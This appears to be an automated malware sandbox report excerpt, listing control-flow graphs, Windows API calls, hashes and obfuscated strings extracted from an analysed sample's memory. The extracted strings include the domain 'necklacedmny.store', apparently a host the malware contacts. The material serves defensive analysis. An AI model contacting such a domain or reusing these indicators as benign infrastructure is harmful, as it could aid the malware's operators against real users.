                                                                        • Instruction Fuzzy Hash: 31414836708311CFE7189F24EC527AA73E6EB8A314F09983DE586D33A0D674E855CB42

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 600 610ca0-610cbb CoInitializeSecurity 601 610cc2-610ccd call 63bb70 600->601 602 610ddd 600->602 605 610cd2-610ce6 601->605 604 610de3 602->604 606 610de6-610def 604->606 607 610cf0-610d0e 605->607 608 610df1-610df4 606->608 609 610e0b-610e13 606->609 607->607 610 610d10-610d5f 607->610 611 610e00-610e09 608->611 612 610e15-610e19 609->612 613 610e2d 609->613 614 610d60-610d8e 610->614 611->609 611->611 615 610e20-610e29 612->615 617 610e30-610ee6 613->617 614->614 616 610d90-610d9c 614->616 615->615 619 610e2b 615->619 620 610dbb-610dc3 616->620 621 610d9e-610da1 616->621 618 610ef0-610f23 617->618 618->618 622 610f25-610f4b 618->622 619->617 620->604 623 610dc5-610dc9 620->623 624 610db0-610db9 621->624 625 610f50-610f89 622->625 626 610dd0-610dd9 623->626 624->620 624->624 625->625 627 610f8b-610fa9 call 60fa80 625->627 626->626 628 610ddb 626->628 630 610fae-610fb4 627->630 628->606 631 610fbb-610fc8 630->631 632 61103d-611046 call 603dc0 630->632 633 610fcf-610ff7 630->633 631->631 631->633 637 610ff9-610ffc 633->637 638 610ffe 633->638 637->638 639 610fff-611007 637->639 638->639 640 611009-61100c 639->640 641 61100e 639->641 640->641 642 61100f-611036 call 60c880 call 63c620 call 63e210 640->642 641->642 642->631 642->632 642->633
                                                                        APIs
                                                                        • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00610CB3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeSecurity
                                                                        • String ID: 7CB170F54527605EE227D36909F09D60$Mz$necklacedmny.store$tO
                                                                        • API String ID: 640775948-2168123166
                                                                        • Opcode ID: cd141b7cd514857bfec6ff396270fd006622ca2027bb4d2fa109cc2ded540859
                                                                        • Instruction ID: 28cfe5bbafed4a785a3f4de567c847dfc7c72d9688b86a40bcdb08b23409c0fe
                                                                        • Opcode Fuzzy Hash: cd141b7cd514857bfec6ff396270fd006622ca2027bb4d2fa109cc2ded540859
                                                                        • Instruction Fuzzy Hash: FCA120B05047828FE325CF25C8907A3BBA2FF52304F19899CD0D64BB56D775E886CB91
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID: FreeLibrary
                                                                        • String ID:
                                                                        • API String ID: 3664257935-0
                                                                        • Opcode ID: 8dde4927c1eda5513760ab4a2365b336eac87feedd4649de95acfebb22308d25
                                                                        • Instruction ID: b5635becabf98dabb11ca7aa0d9bae429acce419b587a8e934757c2ff8aeef35
                                                                        • Opcode Fuzzy Hash: 8dde4927c1eda5513760ab4a2365b336eac87feedd4649de95acfebb22308d25
                                                                        • Instruction Fuzzy Hash: 9531F6312057818FD7258F29C4907A2BBE3BF9A301F2886ADD0D64B752C735A886CB90
                                                                        APIs
                                                                        • CoInitializeEx.COMBASE(00000000,00000002), ref: 00610C8D
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Initialize
                                                                        • String ID:
                                                                        • API String ID: 2538663250-0
                                                                        • Opcode ID: eaae6ef7cbed89d5dc5858b730e6fa6ba23ebb22338f6ec68214f4e032004373
                                                                        • Instruction ID: d49de5e5aad022a9aeb6e09b25396b303101b35856cf793b12c68e1549f2b659
                                                                        • Opcode Fuzzy Hash: eaae6ef7cbed89d5dc5858b730e6fa6ba23ebb22338f6ec68214f4e032004373
                                                                        • Instruction Fuzzy Hash: 8D31CCB5D10B40ABD730BE3D9A0B6177DB4A702660F40472DF8E69A6C4F230A4298BD7
                                                                        APIs
                                                                        • RtlReAllocateHeap.NTDLL(?,00000000,?,?), ref: 00640ED8
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        • Associated: 00000000.00000002.2156312435.000000000087D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156325652.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156337917.0000000000880000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156351117.0000000000887000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156364474.0000000000890000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156376920.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156391412.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156404038.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156416779.0000000000896000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156430199.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156449646.00000000008BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156502636.000000000090C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156519788.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.000000000090E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.0000000000915000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156564951.0000000000923000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156577837.0000000000924000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID: AllocateHeap
                                                                        • String ID:
                                                                        • API String ID: 1279760036-0
                                                                        • Opcode ID: 15d7ca51e4c543ae6b7e34691cccf9b55d9d4ee7dbce3217e862d72d8284b185
                                                                        • Instruction ID: 4f0e3bc1759d1ff06af53e742b9b6259147e0f78c4b1ea7f357cec78e72c9172
                                                                        • Opcode Fuzzy Hash: 15d7ca51e4c543ae6b7e34691cccf9b55d9d4ee7dbce3217e862d72d8284b185
                                                                        • Instruction Fuzzy Hash: 3511BD33F501228BDB1C8F78EC616AD7756FB05324B090AB9E916E7280DB79DA0047C0
                                                                        APIs
                                                                        • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 0063E204
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID: AllocateHeap
                                                                        • String ID:
                                                                        • API String ID: 1279760036-0
                                                                        • Opcode ID: 54f0c51761d78a8fb583116b92e5d055e0935963f0400b85410539033e7c92e5
                                                                        • Instruction ID: 90646133149cfe94cc364317959c7fb118395a1de35d233737c8362a5639bb4c
                                                                        • Opcode Fuzzy Hash: 54f0c51761d78a8fb583116b92e5d055e0935963f0400b85410539033e7c92e5
                                                                        • Instruction Fuzzy Hash: C7F0E97429D3405BD3088B10DCA176A7FA69BE1305F08487EE4D107391C67A181DD777
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID: BlanketProxy
                                                                        • String ID:
                                                                        • API String ID: 3890896728-0
                                                                        • Opcode ID: 38c253a2264f0dfa73dd6b6436f1b3988a27460fd55952aab43e3bd2f2fe5bc1
                                                                        • Instruction ID: 90eb1901b1c6de0f518a776fd4efeaa44cf1784e3632aa4ba8b7f0340c588b05
                                                                        • Opcode Fuzzy Hash: 38c253a2264f0dfa73dd6b6436f1b3988a27460fd55952aab43e3bd2f2fe5bc1
                                                                        • Instruction Fuzzy Hash: 51F014B4108701CFE311EF29D1A875ABBF1FB85304F10594CE4958B3A0C7B6A949CF82
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        • Associated: 00000000.00000002.2156564951.0000000000923000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156577837.0000000000924000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID: BlanketProxy
                                                                        • String ID:
                                                                        • API String ID: 3890896728-0
                                                                        • Opcode ID: c7703fe24ee6f37d7f490f00da4b632b309d59e6f0a1a71e5b53157822263f26
                                                                        • Instruction ID: db14ce2fb419a9b273d0683e883f9e7a85f82eb6a7c93a5798130072f48e15dd
                                                                        • Opcode Fuzzy Hash: c7703fe24ee6f37d7f490f00da4b632b309d59e6f0a1a71e5b53157822263f26
                                                                        • Instruction Fuzzy Hash: 9EF074741083418FE320EF15C15870BBBE4BFC5304F11890CE4988B291CBB595488F83
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ($+$-$/$0$1$2$3$4$8$8$9$9$;$<$=$>$?$?$@$A$B$C$E$G$H$I$K$M$O$Q$S$S$U$W$Y$[$\$]$_$a$c$e$g$i$k$m$o$q$s$u$w$x$y${$|$|$}
                                                                        • API String ID: 0-901420310
                                                                        • Opcode ID: f9e4abf9c26f15cf156b0a86c184feba6dae8aca8e0c43aeb93753a9303d6058
                                                                        • Instruction ID: 2b5f973faf95199c2277e24c99ac78eb52a60064e00b612b8af0bb1c6cdf614c
                                                                        • Opcode Fuzzy Hash: f9e4abf9c26f15cf156b0a86c184feba6dae8aca8e0c43aeb93753a9303d6058
                                                                        • Instruction Fuzzy Hash: 2D2230219087E989DB32C67C8C487DDBEA15B67324F0843D9D1E96B2D2C7B50B85CB62
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: !$#$$$%$'$)$+$-$/$0$1$3$4$5$7$9$;$<$=$>$?$@$A$E$E$G$H$M$X$Y$[$h$r$s$t
                                                                        • API String ID: 0-3672740722
                                                                        • Opcode ID: a486a1e72b787a1ddd94657c7c57a8175427ab34cb6ba8cf9d6b3f9e033c8b5a
                                                                        • Instruction ID: d5527c5c1a55041549070ac2687f4afe14400ea9659083dac2bcc82f1126dc5b
                                                                        • Opcode Fuzzy Hash: a486a1e72b787a1ddd94657c7c57a8175427ab34cb6ba8cf9d6b3f9e033c8b5a
                                                                        • Instruction Fuzzy Hash: 07E1A321D087E98EDB22CABC88083DDBFB25B52314F1842DDD4E9AB3C2C7754A45DB52
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 3Jc$3Jc$:1c$>7c$><c$GBc$H3c$LDc$LJc$XOc$aDc$aDc$c7c$rOc$w,c$}/c$~;c$-c$=c
                                                                        • API String ID: 0-896302676
                                                                        • Opcode ID: fdac95f638cd866a3ee232f0f7cf86e3e17388162e9ef8107f6ec4536b1a5e15
                                                                        • Instruction ID: 53ed013538aeb910e7289f98f15c31db1c924dbf43eb07a17d01baf578091c76
                                                                        • Opcode Fuzzy Hash: fdac95f638cd866a3ee232f0f7cf86e3e17388162e9ef8107f6ec4536b1a5e15
                                                                        • Instruction Fuzzy Hash: 806250F0A11B009FD3A1CF2DD892B82BFEDAB0E750F01495DA1AED7351D7B569008B66
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: G"A$&+$*$/E;C$/$$2A"_$@C$O\$SX$_Y$h#j=$i'd!$lF$m9O7$pq$pq$r3$31
                                                                        • API String ID: 0-1158987392
                                                                        • Opcode ID: da7948afa0c575585f65a80d7efe0ab77a4f6f4258f23af03c52645a06067fa3
                                                                        • Instruction ID: 30391039ddf3916d0fdd98f04b2dc35dffd27a6a77178333c929c580a582baac
                                                                        • Opcode Fuzzy Hash: da7948afa0c575585f65a80d7efe0ab77a4f6f4258f23af03c52645a06067fa3
                                                                        • Instruction Fuzzy Hash: 3A721BB41093858AE374CF25D881BDFBBE2FB92304F10892DD6D99B251EB749146CF92
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $ $ $ $ $ $ $-$0123456789ABCDEFXP$0123456789abcdefxp$gfff$gfff$gfff$gfff
                                                                        • API String ID: 0-3131871939
                                                                        • Opcode ID: a8debc34e5d229b56a7d6317f008876549dec7cacb44c4de1b781448b96ef6b3
                                                                        • Instruction ID: 560dfe87aba657de8eeb13a4a129cc6f6019e6f39b2f1ee12299b79b1b5c8778
                                                                        • Opcode Fuzzy Hash: a8debc34e5d229b56a7d6317f008876549dec7cacb44c4de1b781448b96ef6b3
                                                                        • Instruction Fuzzy Hash: 0DE2C0716483528FC71CCE28C49436BBBE3AF96314F18866DE4968B3D1D774DA46CB82
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: &?3$,/.1$3210$4761$8;:5$8?$L$RdOh$X[Z]$dgfi$h$mdOh$w`k
                                                                        • API String ID: 0-3944949542
                                                                        • Opcode ID: 41417a783062f3553ffe21c8ad55db82fd99e960e4151fad46f15daad3fc5492
                                                                        • Instruction ID: c561e26797bda92bce5e75e003c6360034f2a26bb03ee0cb19f602203cee20d7
                                                                        • Opcode Fuzzy Hash: 41417a783062f3553ffe21c8ad55db82fd99e960e4151fad46f15daad3fc5492
                                                                        • Instruction Fuzzy Hash: 59B2CD7160C7918BE724CF24D4907EBBBE2AFD6304F18892DE4C98B392D7759905CB92
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        • Associated: 00000000.00000002.2156294268.0000000000868000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156312435.000000000087D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156325652.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156337917.0000000000880000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156351117.0000000000887000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156364474.0000000000890000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156376920.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156391412.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156404038.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156416779.0000000000896000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156430199.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156449646.00000000008BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156502636.000000000090C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156519788.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.000000000090E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.0000000000915000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156564951.0000000000923000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156577837.0000000000924000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 0$0$0$0000$0000$0000$0000$0000$0000$0000$@$i
                                                                        • API String ID: 0-3385986306
                                                                        • Opcode ID: c2304f0ef27442592c5021e4b0d70f5b2f5e5a22675b84534056c2ed4a41df5e
                                                                        • Instruction ID: fa0ede0255c195c950079580d34f81e025521a22cc9dab66f782ced263813843
                                                                        • Opcode Fuzzy Hash: c2304f0ef27442592c5021e4b0d70f5b2f5e5a22675b84534056c2ed4a41df5e
                                                                        • Instruction Fuzzy Hash: 0882C175A493828BC71DCF28C4A835BBBE2AF85704F18896DE48A973D1D374DD45CB82
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Kb$;Ib$JJb$LCb$PIb$b6b$Db
                                                                        • API String ID: 0-3650975795
                                                                        • Opcode ID: 547c10da5a1fedd28967422140f3184212a828209ebd4f5bfcb75f0a89f5d954
                                                                        • Instruction ID: de24936494e5b12fd804c07ad567cdbe1c22a24800236a5118f1d809877afb5b
                                                                        • Opcode Fuzzy Hash: 547c10da5a1fedd28967422140f3184212a828209ebd4f5bfcb75f0a89f5d954
                                                                        • Instruction Fuzzy Hash: E7727FB0608F808ED3268F3C8845797BFD66B5A314F184A6DD0EE873D2C779A505CB66
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: "ub$2yb$3768$:?-)$InA>$i7b0$~x||
                                                                        • API String ID: 0-2698113861
                                                                        • Opcode ID: 0a3566d794183ef0f2297c5e83fc709cbf81282cbb40ac849f29bd8d6248d769
                                                                        • Instruction ID: 4ab39cc8baa6ee177113f246e1ee8b3ff848d6bd37106b6feebeca9239bba447
                                                                        • Opcode Fuzzy Hash: 0a3566d794183ef0f2297c5e83fc709cbf81282cbb40ac849f29bd8d6248d769
                                                                        • Instruction Fuzzy Hash: 6B321376A08722CFD314CF28DC90A6AB7E2FF89310F19996CE98597390D735E951CB81
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        • Associated: 00000000.00000002.2156533988.0000000000915000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156564951.0000000000923000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156577837.0000000000924000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: [lT$ a$?c;}$iX)$ij$ZlT$]Z[
                                                                        • API String ID: 0-51037172
                                                                        • Opcode ID: 8541c8889cd5ce702a262321060a9291cbc9dc34d3aaca85eccb3d36cecf5360
                                                                        • Instruction ID: 5855b2157a33210b4e08d9e0012d944e815bbac0b5644e65a240bc0ec06512ae
                                                                        • Opcode Fuzzy Hash: 8541c8889cd5ce702a262321060a9291cbc9dc34d3aaca85eccb3d36cecf5360
                                                                        • Instruction Fuzzy Hash: D032DFB0600701CFC724CF29C491666BBF2FF95314B19CAADD4968BB96D734E886CB90
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2156053250.00000000007CD000.00000080.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: %bo$&Gsg$3Pow$4y7}$EU?$Gp-H
                                                                        • API String ID: 0-1087187141
                                                                        • Opcode ID: 942377bcc119ea031685d693528bee61db9e6e38fef316511fb8894a93e56e10
                                                                        • Instruction ID: d472e94c9c3586b1a3b42c0ffed875eeccb7aca0104754e59824ac5f2d3d4896
                                                                        • Opcode Fuzzy Hash: 942377bcc119ea031685d693528bee61db9e6e38fef316511fb8894a93e56e10
                                                                        • Instruction Fuzzy Hash: A2B2F4F360C2049FE3046E29EC8567AFBE9EF94720F1A493DE6C4C3744EA3598458697
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 7CB170F54527605EE227D36909F09D60$@ffI$itkj$q`h}$xy$yleh$uw
                                                                        • API String ID: 0-539617692
                                                                        • Opcode ID: 1a457511c59e250ae7160f10643c6564ef4a54d2931079a2dba519d1439760b1
                                                                        • Instruction ID: 2bea78e0be67ecbcf26a51762258116f108e28fa0da0ed2289478b7b152c6d39
                                                                        • Opcode Fuzzy Hash: 1a457511c59e250ae7160f10643c6564ef4a54d2931079a2dba519d1439760b1
                                                                        • Instruction Fuzzy Hash: 2DC1EFB02483849FE314DF65D88176FBBE5EBD6308F14892CE1D58B392D7788909CB96
                                                                        APIs
                                                                        • FreeLibrary.KERNEL32(C5A2897E), ref: 00630B86
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID: FreeLibrary
                                                                        • String ID: lcw|<a$o~{q$w|<a${{up
                                                                        • API String ID: 3664257935-3972657743
                                                                        • Opcode ID: 7f5f3743fa8e10d2c8cefcb14c352433fc5e259f0d867146d4c7f7523f0f2715
                                                                        • Instruction ID: 17fd4b15be1da0e332133ced1159e02a981a1b4dad4dd0375a0aa4a5aa9361f4
                                                                        • Opcode Fuzzy Hash: 7f5f3743fa8e10d2c8cefcb14c352433fc5e259f0d867146d4c7f7523f0f2715
                                                                        • Instruction Fuzzy Hash: 5FA147702447428BE3258F24C8A17A3FBA3FF95314F28865DD4A60B7D2D776E90AC791
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2156053250.00000000007CD000.00000080.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: -5;o$:er}$OBu$aGcT$lTo$gM
                                                                        • API String ID: 0-3076847167
                                                                        • Opcode ID: 80fd02519b40cad669a893245d582586b312702b65b9b1c49010330758185c88
                                                                        • Instruction ID: 32b0d858d0ff82141577d7c3300f7ce8def61eec40c3926d01f7c807bf98615a
                                                                        • Opcode Fuzzy Hash: 80fd02519b40cad669a893245d582586b312702b65b9b1c49010330758185c88
                                                                        • Instruction Fuzzy Hash: ED62F7F360C2009FE308AE2DEC9567AB7E9EF94320F1A453DE6C5C7744EA3598058697
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2156053250.00000000007CD000.00000080.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 7Sm{$B%|2$f`=$yU~$z+n
                                                                        • API String ID: 0-3530498783
                                                                        • Opcode ID: f90e377bbfb3c3e18e3e1fb60415a1145fd695ec322c1014ca8dc81be759e6f6
                                                                        • Instruction ID: d345fc382eecd01af1a5b8107db88662f3c08d88bdad8d5666077b5ac18a72b9
                                                                        • Opcode Fuzzy Hash: f90e377bbfb3c3e18e3e1fb60415a1145fd695ec322c1014ca8dc81be759e6f6
                                                                        • Instruction Fuzzy Hash: 5BB2F5F360C2009FE304AE2DEC8577ABBE9EF94720F1A493DEAC4C7744E63558058696
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Y^S$#g>#$$*- $UjcW$YRTP$o$
                                                                        • API String ID: 0-2638604102
                                                                        • Opcode ID: eded1bac503dbedf9130afac779b2e1886417a21fd05fe085d5c7cd12c9f8a4e
                                                                        • Instruction ID: c4e80c091491f7da59c5cf33f73312974c0e4bb986a5be8b86b9df71a5910e17
                                                                        • Opcode Fuzzy Hash: eded1bac503dbedf9130afac779b2e1886417a21fd05fe085d5c7cd12c9f8a4e
                                                                        • Instruction Fuzzy Hash: F5A14D31A487A18FD738CB6494913E7BBE2DF95350F088A6DD8D94B382C7309809DB66
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        • Associated: 00000000.00000002.2156266060.000000000085E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156294268.0000000000868000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156312435.000000000087D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156325652.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156337917.0000000000880000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156351117.0000000000887000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156364474.0000000000890000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156376920.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156391412.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
